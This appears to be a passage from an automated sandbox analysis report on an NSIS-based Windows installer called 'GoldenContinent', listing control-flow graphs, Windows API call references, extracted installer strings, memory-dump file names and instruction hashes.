                                                                                                                                                                                                                                                                            control_flow_graph 587 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 590 403603-403608 587->590 591 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 587->591 592 4037e2-4037e6 590->592 599 403641 591->599 600 403728-403736 call 4032d2 591->600 602 403646-40365d 599->602 606 4037f1-4037f6 600->606 607 40373c-40373f 600->607 604 403661-403663 call 403336 602->604 605 40365f 602->605 611 403668-40366a 604->611 605->604 606->592 609 403741-403759 call 403368 call 403336 607->609 610 40376b-403795 GlobalAlloc call 403368 call 40337f 607->610 609->606 638 40375f-403765 609->638 610->606 636 403797-4037a8 610->636 614 403670-403677 611->614 615 4037e9-4037f0 call 4032d2 611->615 616 4036f3-4036f7 614->616 617 403679-40368d call 405e38 614->617 615->606 623 403701-403707 616->623 624 4036f9-403700 call 4032d2 616->624 617->623 634 40368f-403696 617->634 627 403716-403720 623->627 628 403709-403713 call 4072ad 623->628 624->623 627->602 635 403726 627->635 628->627 634->623 640 403698-40369f 634->640 635->600 641 4037b0-4037b3 636->641 642 4037aa 636->642 638->606 638->610 640->623 643 4036a1-4036a8 640->643 644 4037b6-4037be 641->644 642->641 643->623 645 4036aa-4036b1 643->645 644->644 646 4037c0-4037db SetFilePointer call 405e38 644->646 645->623 647 4036b3-4036d3 645->647 650 4037e0 646->650 647->606 649 4036d9-4036dd 647->649 651 4036e5-4036ed 649->651 652 4036df-4036e3 649->652 650->592 651->623 653 4036ef-4036f1 651->653 652->635 652->651 653->623
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                                                                                                                                                              • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                              • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                                                                                                                                            • Null, xrefs: 004036AA
                                                                                                                                                                                                                                                                            • Inst, xrefs: 00403698
                                                                                                                                                                                                                                                                            • Error launching installer, xrefs: 00403603
                                                                                                                                                                                                                                                                            • soft, xrefs: 004036A1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                                                            • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                                                                            • API String ID: 4283519449-527102705
                                                                                                                                                                                                                                                                            • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                                                                                                                            • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 654 40337f-403398 655 4033a1-4033a9 654->655 656 40339a 654->656 657 4033b2-4033b7 655->657 658 4033ab 655->658 656->655 659 4033c7-4033d4 call 403336 657->659 660 4033b9-4033c2 call 403368 657->660 658->657 664 4033d6 659->664 665 4033de-4033e5 659->665 660->659 666 4033d8-4033d9 664->666 667 403546-403548 665->667 668 4033eb-403432 GetTickCount 665->668 671 403567-40356b 666->671 669 40354a-40354d 667->669 670 4035ac-4035af 667->670 672 403564 668->672 673 403438-403440 668->673 674 403552-40355b call 403336 669->674 675 40354f 669->675 676 4035b1 670->676 677 40356e-403574 670->677 672->671 678 403442 673->678 679 403445-403453 call 403336 673->679 674->664 687 403561 674->687 675->674 676->672 682 403576 677->682 683 403579-403587 call 403336 677->683 678->679 679->664 688 403455-40345e 679->688 682->683 683->664 691 40358d-40359f WriteFile 683->691 687->672 690 403464-403484 call 4076a0 688->690 697 403538-40353a 690->697 698 40348a-40349d GetTickCount 690->698 693 4035a1-4035a4 691->693 694 40353f-403541 691->694 693->694 696 4035a6-4035a9 693->696 694->666 696->670 697->666 699 4034e8-4034ec 698->699 700 40349f-4034a7 698->700 701 40352d-403530 699->701 702 4034ee-4034f1 699->702 703 4034a9-4034ad 700->703 704 4034af-4034e0 MulDiv wsprintfW call 404f9e 700->704 701->673 708 403536 701->708 706 403513-40351e 702->706 707 4034f3-403507 WriteFile 702->707 703->699 703->704 709 4034e5 704->709 711 403521-403525 706->711 707->694 710 403509-40350c 707->710 708->672 709->699 710->694 712 40350e-403511 710->712 711->690 713 40352b 711->713 712->711 713->672
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                                                                                                                                            • WriteFile.KERNELBASE(00000000,00000000,00429E6D,00403792,00000000), ref: 004034FF
                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                                                                                                            • String ID: (]C$... %d%%$pAB
                                                                                                                                                                                                                                                                            • API String ID: 651206458-3635341587
                                                                                                                                                                                                                                                                            • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                                            • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00445D80,00429E6D,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(004034E5,00445D80,00429E6D,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00429E6D,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                              • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00429E6D,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2740478559-0
                                                                                                                                                                                                                                                                            • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                                                                                                                            • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 729 401eb9-401ec4 730 401f24-401f26 729->730 731 401ec6-401ec9 729->731 732 401f53-401f7b GlobalAlloc call 406831 730->732 733 401f28-401f2a 730->733 734 401ed5-401ee3 call 4062cf 731->734 735 401ecb-401ecf 731->735 750 4030e3-4030f2 732->750 751 402387-40238d GlobalFree 732->751 736 401f3c-401f4e call 406035 733->736 737 401f2c-401f36 call 4062cf 733->737 747 401ee4-402702 call 406831 734->747 735->731 738 401ed1-401ed3 735->738 736->751 737->736 738->734 742 401ef7-402e50 call 406035 * 3 738->742 742->750 762 402708-40270e 747->762 751->750 762->750
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                            • GlobalFree.KERNELBASE(00806460), ref: 00402387
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FreeGloballstrcpyn
                                                                                                                                                                                                                                                                            • String ID: Exch: stack < %d elements$Pop: stack empty$WesternJpg
                                                                                                                                                                                                                                                                            • API String ID: 1459762280-3247540519
                                                                                                                                                                                                                                                                            • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                                                                                                            • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 764 4022fd-402325 call 40145c GetFileVersionInfoSizeW 767 4030e3-4030f2 764->767 768 40232b-402339 GlobalAlloc 764->768 768->767 770 40233f-40234e GetFileVersionInfoW 768->770 772 402350-402367 VerQueryValueW 770->772 773 402384-40238d GlobalFree 770->773 772->773 774 402369-402381 call 405f7d * 2 772->774 773->767 774->773
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                                                                                                            • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                                                                                                            • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                                                                                                              • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                            • GlobalFree.KERNELBASE(00806460), ref: 00402387
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3376005127-0
                                                                                                                                                                                                                                                                            • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                            • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 780 402b23-402b37 GlobalAlloc 781 402b39-402b49 call 401446 780->781 782 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 780->782 787 402b70-402b73 781->787 782->787 788 402b93 787->788 789 402b75-402b8d call 405f96 WriteFile 787->789 791 4030e3-4030f2 788->791 789->788 795 402384-40238d GlobalFree 789->795 795->791
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2568930968-0
                                                                                                                                                                                                                                                                            • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                            • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 797 402713-40273b call 406035 * 2 802 402746-402749 797->802 803 40273d-402743 call 40145c 797->803 805 402755-402758 802->805 806 40274b-402752 call 40145c 802->806 803->802 809 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 805->809 810 40275a-402761 call 40145c 805->810 806->805 810->809
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                                                                                                            • String ID: <RM>$WesternJpg$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                                                                                                                                                            • API String ID: 247603264-3518307370
                                                                                                                                                                                                                                                                            • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                            • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 818 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 829 402223-4030f2 call 4062cf 818->829 830 40220d-40221b call 4062cf 818->830 830->829
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00429E6D,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00429E6D,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00429E6D,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                            • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                                                                                                                            • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                                                                                                                            Memory Dump Source
